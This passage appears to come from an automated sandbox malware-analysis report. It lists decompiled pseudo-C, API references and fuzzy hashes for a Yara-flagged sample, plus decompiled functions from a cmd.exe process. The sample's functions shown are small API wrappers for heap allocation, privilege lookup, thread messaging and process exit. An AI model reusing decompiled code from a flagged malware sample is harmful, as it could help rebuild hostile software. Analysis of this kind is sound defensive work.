                                    • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: 65A
                                    • API String ID: 1279760036-2085483392
                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 344 407280-4072ca call 41a140 call 41ad20 call 409b40 call 413e50 353 4072cc-4072de PostThreadMessageW 344->353 354 4072fe-407302 344->354 355 4072e0-4072fa call 4092a0 353->355 356 4072fd 353->356 355->356 356->354
                                    C-Code - Quality: 82%
                                    			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                    				char _v67;
                                    				char _v68;
                                    				void* _t12;
                                    				intOrPtr* _t13;
                                    				int _t14;
                                    				long _t21;
                                    				intOrPtr* _t25;
                                    				void* _t26;
                                    				void* _t30;
                                    
                                    				_t30 = __eflags;
                                    				_v68 = 0;
                                    				E0041A140( &_v67, 0, 0x3f);
                                    				E0041AD20( &_v68, 3);
                                    				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
                                    				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                    				_t25 = _t13;
                                    				if(_t25 != 0) {
                                    					_t21 = _a8;
                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                    					_t32 = _t14;
                                    					if(_t14 == 0) {
                                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                    					}
                                    					return _t14;
                                    				}
                                    				return _t13;
                                    			}












                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                    • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                    • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                    • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 380 4188f0-418906 381 41890c-418921 RtlFreeHeap 380->381 382 418907 call 4191e0 380->382 382->381
                                    C-Code - Quality: 100%
                                    			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                    				char _t10;
                                    				void* _t15;
                                    
                                    				_t3 = _a4 + 0xc74; // 0xc74
                                    				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                    				return _t10;
                                    			}





                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                    				int _t10;
                                    				void* _t15;
                                    
                                    				_t7 = _a4;
                                    				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                    				return _t10;
                                    			}





                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E00418922(intOrPtr _a4, int _a8) {
                                    				void* _t15;
                                    
                                    				asm("adc eax, 0xaf95ccf");
                                    				asm("in al, 0x55");
                                    				_t6 = _a4;
                                    				E004191E0(_t15, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
                                    				ExitProcess(_a8);
                                    			}




                                    APIs
                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 4fb69927f300ce01bfdc89470c9170a077f6e3de3322b6d5ff6f01abe3f95379
                                    • Instruction ID: 70a77c489f3fd9436576a7529edcd1e9ce771395e4f518b155397fc3cc4fefed
                                    • Opcode Fuzzy Hash: 4fb69927f300ce01bfdc89470c9170a077f6e3de3322b6d5ff6f01abe3f95379
                                    • Instruction Fuzzy Hash: FEE04675600204BBE621DB65CC85EC37BA8AF48760F018258F9195B342C671AA00CAE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00418930(intOrPtr _a4, int _a8) {
                                    				void* _t10;
                                    
                                    				_t5 = _a4;
                                    				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                    				ExitProcess(_a8);
                                    			}




                                    APIs
                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                    • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                    • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Executed Functions

                                    Non-executed Functions

                                    C-Code - Quality: 48%
                                    			E011F3506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
                                    				signed int _v8;
                                    				signed int _v16;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
                                    				unsigned int _v36;
                                    				intOrPtr _v40;
                                    				unsigned int _v44;
                                    				intOrPtr _v50;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
                                    				signed int _v68;
                                    				void* _v76;
                                    				void* _v80;
                                    				DWORD* _v84;
                                    				long _v88;
                                    				void* _v90;
                                    				signed int _v92;
                                    				int _v96;
                                    				void* _v100;
                                    				long _v108;
                                    				signed int _v112;
                                    				void* _v120;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t83;
                                    				void* _t85;
                                    				int _t86;
                                    				int _t87;
                                    				int _t93;
                                    				signed int _t95;
                                    				void* _t99;
                                    				void* _t104;
                                    				void* _t105;
                                    				void _t106;
                                    				void _t107;
                                    				signed int _t108;
                                    				void* _t118;
                                    				void _t119;
                                    				signed int _t133;
                                    				signed int _t134;
                                    				void* _t141;
                                    				void* _t142;
                                    				long _t143;
                                    				void* _t147;
                                    				signed char _t149;
                                    				signed int _t152;
                                    				void* _t156;
                                    				signed int _t157;
                                    				void* _t159;
                                    				void* _t163;
                                    				void* _t168;
                                    				void* _t169;
                                    				int _t170;
                                    				void* _t177;
                                    				void* _t178;
                                    				void* _t181;
                                    				void* _t182;
                                    				void* _t184;
                                    				void* _t185;
                                    				DWORD* _t187;
                                    				void* _t189;
                                    				struct _COORD _t190;
                                    				signed int _t191;
                                    				signed int _t193;
                                    				void* _t196;
                                    				void* _t197;
                                    				void* _t206;
                                    				void* _t207;
                                    
                                    				_t173 = __edx;
                                    				_t193 = (_t191 & 0xfffffff8) - 0x54;
                                    				_t83 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t83 ^ _t193;
                                    				_t187 = _a8;
                                    				_t184 = __edx;
                                    				_v56.dwCursorPosition = __ecx;
                                    				_v80 = _t187;
                                    				_t85 = GetStdHandle(0xfffffff5);
                                    				_v76 = _t85;
                                    				if(_t85 == 0xffffffff) {
                                    					__imp___get_osfhandle(1);
                                    					_v76 = _t85;
                                    				}
                                    				if( *0x1213cc9 == 0) {
                                    					L66:
                                    					__imp__AcquireSRWLockShared(0x1217f20);
                                    					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
                                    					__imp__ReleaseSRWLockShared(0x1217f20);
                                    					_t87 = _t86;
                                    				} else {
                                    					_t147 = 0x20;
                                    					_t196 =  *0x11fd0d8 - _t147; // 0x20
                                    					if(_t196 >= 0) {
                                    						goto L66;
                                    					} else {
                                    						_t197 =  *0x11fd0d4 - _t147; // 0x20
                                    						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
                                    							goto L66;
                                    						} else {
                                    							_t149 =  *0x11fd0d8; // 0x20
                                    							_t190 = _v32.dwCursorPosition;
                                    							_t142 = 0;
                                    							_t173 = 1 << _t149;
                                    							asm("bts edx, eax");
                                    							_v68 = _t190;
                                    							_v56.wAttributes = 0x10;
                                    							_v56.dwSize = 0;
                                    							_v44 = 0;
                                    							_v40 = 1;
                                    							_v36 = 0;
                                    							E011FB4DD( *0x11fd0d4 & 0x0000ffff);
                                    							 *0x11fd580 = 0;
                                    							 *0x11fd578 = 0;
                                    							 *0x11fd574 = 0;
                                    							 *0x11fd57c = 0;
                                    							while(1) {
                                    								L7:
                                    								__imp__AcquireSRWLockShared(0x1217f20);
                                    								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
                                    								_v92 = _t93;
                                    								__imp__ReleaseSRWLockShared(0x1217f20);
                                    								_v68 =  *_v88;
                                    								if( *0x11fd544 == 0) {
                                    									_t95 = 0;
                                    									__eflags = 0;
                                    								} else {
                                    									EnterCriticalSection( *0x1203858);
                                    									 *0x11fd544 = 0;
                                    									LeaveCriticalSection( *0x1203858);
                                    									if(_t142 != 0) {
                                    										RtlFreeHeap(GetProcessHeap(), 0, _t142);
                                    									}
                                    									_t95 = 0;
                                    									_t142 = 0;
                                    								}
                                    								if(_v96 == 0) {
                                    									break;
                                    								}
                                    								_t173 = _t173 | 0xffffffff;
                                    								_v92 = _v92 | 0xffffffff;
                                    								_v80 = _t95;
                                    								if( *_v88 <= 0) {
                                    									break;
                                    								} else {
                                    									while(1) {
                                    										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
                                    										if(_t152 == 0xd) {
                                    											break;
                                    										}
                                    										_t206 = _t152 -  *0x11fd0d8; // 0x20
                                    										if(_t206 == 0) {
                                    											_v92 = _t95;
                                    											goto L25;
                                    										} else {
                                    											_t207 = _t152 -  *0x11fd0d4; // 0x20
                                    											if(_t207 == 0) {
                                    												_v92 = _t95;
                                    												_v80 = 1;
                                    												L24:
                                    												__eflags = _t173 - 0xffffffff;
                                    												if(_t173 != 0xffffffff) {
                                    													goto L18;
                                    												} else {
                                    													L25:
                                    													__eflags = _t95 - 0xffffffff;
                                    													if(_t95 == 0xffffffff) {
                                    														goto L18;
                                    													} else {
                                    														 *_v88 = _t95;
                                    														 *(_t184 + _t95 * 2) = 0;
                                    														__eflags = _t142;
                                    														if(_t142 == 0) {
                                    															L35:
                                    															_v96 = 1;
                                    														} else {
                                    															_t169 = _t142;
                                    															_t133 = _t184;
                                    															while(1) {
                                    																_t181 =  *_t133;
                                    																__eflags = _t181 -  *_t169;
                                    																if(_t181 !=  *_t169) {
                                    																	break;
                                    																}
                                    																__eflags = _t181;
                                    																if(_t181 == 0) {
                                    																	L32:
                                    																	_t170 = 0;
                                    																	_t134 = 0;
                                    																} else {
                                    																	_t182 =  *((intOrPtr*)(_t133 + 2));
                                    																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
                                    																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
                                    																		break;
                                    																	} else {
                                    																		_t133 = _t133 + 4;
                                    																		_t169 = _t169 + 4;
                                    																		__eflags = _t182;
                                    																		if(_t182 != 0) {
                                    																			continue;
                                    																		} else {
                                    																			goto L32;
                                    																		}
                                    																	}
                                    																}
                                    																L34:
                                    																_v96 = _t170;
                                    																__eflags = _t134;
                                    																if(_t134 != 0) {
                                    																	goto L35;
                                    																}
                                    																goto L36;
                                    															}
                                    															asm("sbb eax, eax");
                                    															_t134 = _t133 | 0x00000001;
                                    															_t170 = 0;
                                    															__eflags = 0;
                                    															goto L34;
                                    														}
                                    														L36:
                                    														_t99 = _v80;
                                    														__eflags = _t99;
                                    														if(__eflags == 0) {
                                    															__eflags = _v92 - 2;
                                    															if(__eflags > 0) {
                                    																__imp___wcsnicmp(_t184, L"cd ", 3);
                                    																_t193 = _t193 + 0xc;
                                    																__eflags = _t99;
                                    																if(__eflags == 0) {
                                    																	L45:
                                    																	_t99 = 1;
                                    																} else {
                                    																	__imp___wcsnicmp(_t184, L"rd ", 3);
                                    																	_t193 = _t193 + 0xc;
                                    																	__eflags = _t99;
                                    																	if(__eflags == 0) {
                                    																		goto L45;
                                    																	} else {
                                    																		__imp___wcsnicmp(_t184, L"md ", 3);
                                    																		_t193 = _t193 + 0xc;
                                    																		__eflags = _t99;
                                    																		if(__eflags == 0) {
                                    																			goto L45;
                                    																		} else {
                                    																			__imp___wcsnicmp(_t184, L"chdir ", 6);
                                    																			_t193 = _t193 + 0xc;
                                    																			__eflags = _t99;
                                    																			if(__eflags == 0) {
                                    																				goto L45;
                                    																			} else {
                                    																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
                                    																				_t193 = _t193 + 0xc;
                                    																				__eflags = _t99;
                                    																				if(__eflags == 0) {
                                    																					goto L45;
                                    																				} else {
                                    																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
                                    																					_t193 = _t193 + 0xc;
                                    																					__eflags = _t99;
                                    																					if(__eflags == 0) {
                                    																						goto L45;
                                    																					} else {
                                    																						__imp___wcsnicmp(_t184, L"pushd ", 6);
                                    																						_t193 = _t193 + 0xc;
                                    																						__eflags = _t99;
                                    																						if(__eflags != 0) {
                                    																							_t99 = _v80;
                                    																						} else {
                                    																							goto L45;
                                    																						}
                                    																					}
                                    																				}
                                    																			}
                                    																		}
                                    																	}
                                    																}
                                    															}
                                    														}
                                    														_push(_v96);
                                    														_t155 = _t184;
                                    														_push(_t99);
                                    														_push( !(_v44 >> 4) & 0x00000001);
                                    														_push(_v92);
                                    														_t104 = E011FB2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
                                    														__eflags = _t104;
                                    														if(_t104 == 0) {
                                    															_t105 = E011E7797(_t155);
                                    															__eflags = _t105;
                                    															if(_t105 != 0) {
                                    																 *0x121c014(0xffffffff);
                                    															}
                                    															_t156 = _t184;
                                    															_t73 = _t156 + 2; // 0xc
                                    															_t177 = _t73;
                                    															do {
                                    																_t106 =  *_t156;
                                    																_t156 = _t156 + 2;
                                    																__eflags = _t106 - _v80;
                                    															} while (_t106 != _v80);
                                    															_t157 = _t156 - _t177;
                                    															__eflags = _t157;
                                    															_v68 = _t157 >> 1;
                                    														} else {
                                    															E011F9897();
                                    															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
                                    															__eflags = _t118;
                                    															if(_t118 != 0) {
                                    																_t168 = _v50 - (_v92 + _v108) / _v56;
                                    																__eflags = _t168;
                                    																_v90 = _t168;
                                    																_t190 = _v92;
                                    															}
                                    															_t163 = _t184;
                                    															_t61 = _t163 + 2; // 0xc
                                    															_t178 = _t61;
                                    															do {
                                    																_t119 =  *_t163;
                                    																_t163 = _t163 + 2;
                                    																__eflags = _t119 - _v80;
                                    															} while (_t119 != _v80);
                                    															_v88 = _t163 - _t178 >> 1;
                                    															SetConsoleCursorPosition(_v100, _t190);
                                    															_push( &_v84);
                                    															_push(_t190);
                                    															_push(_v84);
                                    															_push(0x20);
                                    															_push(_v100);
                                    															FillConsoleOutputCharacterW();
                                    															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
                                    															_v88 = _v108;
                                    															E011E06C0(_t163 - _t178 >> 1);
                                    														}
                                    														__eflags = _t142;
                                    														if(_t142 == 0) {
                                    															_t143 = 0;
                                    															__eflags = 0;
                                    														} else {
                                    															_t143 = 0;
                                    															RtlFreeHeap(GetProcessHeap(), 0, _t142);
                                    														}
                                    														_t159 = _t184;
                                    														_t76 = _t159 + 2; // 0xc
                                    														_t173 = _t76;
                                    														do {
                                    															_t107 =  *_t159;
                                    															_t159 = _t159 + 2;
                                    															__eflags = _t107 - _t143;
                                    														} while (_t107 != _t143);
                                    														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
                                    														_t108 = _t77;
                                    														_v112 = _t108;
                                    														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
                                    														__eflags = _t142;
                                    														if(_t142 == 0) {
                                    															_t87 = 0;
                                    														} else {
                                    															_t173 = _v112;
                                    															E011E1040(_t142, _t173, _t184);
                                    															goto L7;
                                    														}
                                    													}
                                    												}
                                    											} else {
                                    												_t95 = _t95 + 1;
                                    												if(_t95 <  *_v88) {
                                    													continue;
                                    												} else {
                                    													goto L18;
                                    												}
                                    											}
                                    										}
                                    										goto L67;
                                    									}
                                    									_t173 = _t95;
                                    									_t95 = _v92;
                                    									goto L24;
                                    								}
                                    								goto L67;
                                    							}
                                    							L18:
                                    							if(_t142 != 0) {
                                    								RtlFreeHeap(GetProcessHeap(), 0, _t142);
                                    							}
                                    							_t87 = _v96;
                                    						}
                                    					}
                                    				}
                                    				L67:
                                    				_pop(_t185);
                                    				_pop(_t189);
                                    				_pop(_t141);
                                    				return E011E6FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
                                    			}

                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 011F352E
                                    • _get_osfhandle.MSVCRT ref: 011F353F
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F357A
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F35E1
                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 011F35F8
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3607
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3626
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3639
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F3647
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F364E
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F36A4
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F36AB
                                    • _wcsnicmp.MSVCRT ref: 011F3750
                                    • _wcsnicmp.MSVCRT ref: 011F3765
                                    • _wcsnicmp.MSVCRT ref: 011F377A
                                    • _wcsnicmp.MSVCRT ref: 011F378F
                                    • _wcsnicmp.MSVCRT ref: 011F37A4
                                    • _wcsnicmp.MSVCRT ref: 011F37B9
                                    • _wcsnicmp.MSVCRT ref: 011F37CE
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 011F381A
                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 011F3865
                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 011F387B
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3892
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F38DA
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F38E1
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 011F390A
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F3911
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3938
                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3949
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                    • API String ID: 2991647268-3100821235
                                    • Opcode ID: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                    • Instruction ID: 45fd8c7e27964852de64885f15b11fef0f8a65f405dab691c5ca65f65186337c
                                    • Opcode Fuzzy Hash: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                    • Instruction Fuzzy Hash: 53C1D671614301AFDB28DF68E89CA6B7BE5FF98714F04492DFA66C2294DB31C581CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 92%
                                    			E011E3F80() {
                                    				signed int _v8;
                                    				short _v264;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t33;
                                    				signed int _t75;
                                    				signed int _t76;
                                    				signed int _t77;
                                    				signed int _t78;
                                    				signed int _t79;
                                    				signed int _t80;
                                    				signed int _t81;
                                    				signed int _t82;
                                    				signed int _t83;
                                    				signed int _t84;
                                    				intOrPtr _t86;
                                    				void* _t87;
                                    				signed int _t89;
                                    				signed int _t90;
                                    				signed int _t91;
                                    				void* _t92;
                                    				short* _t93;
                                    				short* _t94;
                                    				short* _t95;
                                    				short* _t96;
                                    				short* _t97;
                                    				short* _t98;
                                    				short* _t99;
                                    				short* _t100;
                                    				short* _t101;
                                    				short* _t102;
                                    				short* _t103;
                                    				intOrPtr* _t106;
                                    				int _t107;
                                    				int _t108;
                                    				int _t109;
                                    				int _t110;
                                    				int _t111;
                                    				int _t112;
                                    				int _t113;
                                    				int _t114;
                                    				int _t115;
                                    				int _t116;
                                    				void* _t118;
                                    				void* _t120;
                                    				void* _t122;
                                    				void* _t124;
                                    				void* _t126;
                                    				void* _t128;
                                    				void* _t130;
                                    				void* _t132;
                                    				void* _t134;
                                    				int _t136;
                                    				signed int _t138;
                                    
                                    				_t33 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t33 ^ _t138;
                                    				_t136 = E011E41A4();
                                    				if(GetLocaleInfoW(_t136, 0x1e, 0x11ff81c, 8) == 0) {
                                    					_t93 = 0x11ff81c;
                                    					_t107 = 8;
                                    					_t118 = ":" - 0x11ff81c;
                                    					while(1) {
                                    						_t11 = _t107 + 0x7ffffff6; // 0x7ffffffe
                                    						if(_t11 == 0) {
                                    							break;
                                    						}
                                    						_t91 =  *(_t118 + _t93) & 0x0000ffff;
                                    						if(_t91 == 0) {
                                    							break;
                                    						}
                                    						 *_t93 = _t91;
                                    						_t93 =  &(_t93[1]);
                                    						_t107 = _t107 - 1;
                                    						if(_t107 != 0) {
                                    							continue;
                                    						}
                                    						L33:
                                    						_t93 = _t93 - 2;
                                    						L34:
                                    						 *_t93 = 0;
                                    						goto L1;
                                    					}
                                    					if(_t107 != 0) {
                                    						goto L34;
                                    					}
                                    					goto L33;
                                    				}
                                    				L1:
                                    				if(GetLocaleInfoW(_t136, 0x23,  &_v264, 0x80) == 0) {
                                    					L9:
                                    					 *0x11fd540 = 0;
                                    					if(GetLocaleInfoW(_t136, 0x21,  &_v264, 0x80) != 0) {
                                    						_t86 = (_v264 & 0x0000ffff) - 0x30;
                                    						if(_t86 != 0) {
                                    							_t87 = _t86 - 1;
                                    							if(_t87 == 0) {
                                    								 *0x11fd540 = 1;
                                    								 *0x11ff7f8 = L"dd/MM/yy";
                                    							} else {
                                    								if(_t87 == 1) {
                                    									 *0x11fd540 = 2;
                                    									 *0x11ff7f8 = L"yy/MM/dd";
                                    								}
                                    							}
                                    						} else {
                                    							 *0x11fd540 = _t86;
                                    							 *0x11ff7f8 = L"MM/dd/yy";
                                    						}
                                    					}
                                    					 *0x11ff620 = 2;
                                    					if(GetLocaleInfoW(_t136, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
                                    						 *0x11ff620 = 4;
                                    					}
                                    					if(GetLocaleInfoW(_t136, 0x1d, 0x11ff80c, 8) == 0) {
                                    						_t94 = 0x11ff80c;
                                    						_t108 = 8;
                                    						_t120 = "/" - 0x11ff80c;
                                    						while(1) {
                                    							_t13 = _t108 + 0x7ffffff6; // 0x7ffffffe
                                    							if(_t13 == 0) {
                                    								break;
                                    							}
                                    							_t84 =  *(_t120 + _t94) & 0x0000ffff;
                                    							if(_t84 == 0) {
                                    								break;
                                    							}
                                    							 *_t94 = _t84;
                                    							_t94 =  &(_t94[1]);
                                    							_t108 = _t108 - 1;
                                    							if(_t108 != 0) {
                                    								continue;
                                    							}
                                    							L45:
                                    							_t94 = _t94 - 2;
                                    							L46:
                                    							 *_t94 = 0;
                                    							goto L16;
                                    						}
                                    						if(_t108 != 0) {
                                    							goto L46;
                                    						}
                                    						goto L45;
                                    					} else {
                                    						L16:
                                    						if(GetLocaleInfoW(_t136, 0x31, 0x11ff7a8, 0x20) == 0) {
                                    							_t95 = 0x11ff7a8;
                                    							_t109 = 0x20;
                                    							_t122 = L"Mon" - 0x11ff7a8;
                                    							while(1) {
                                    								_t15 = _t109 + 0x7fffffde; // 0x7ffffffe
                                    								if(_t15 == 0) {
                                    									break;
                                    								}
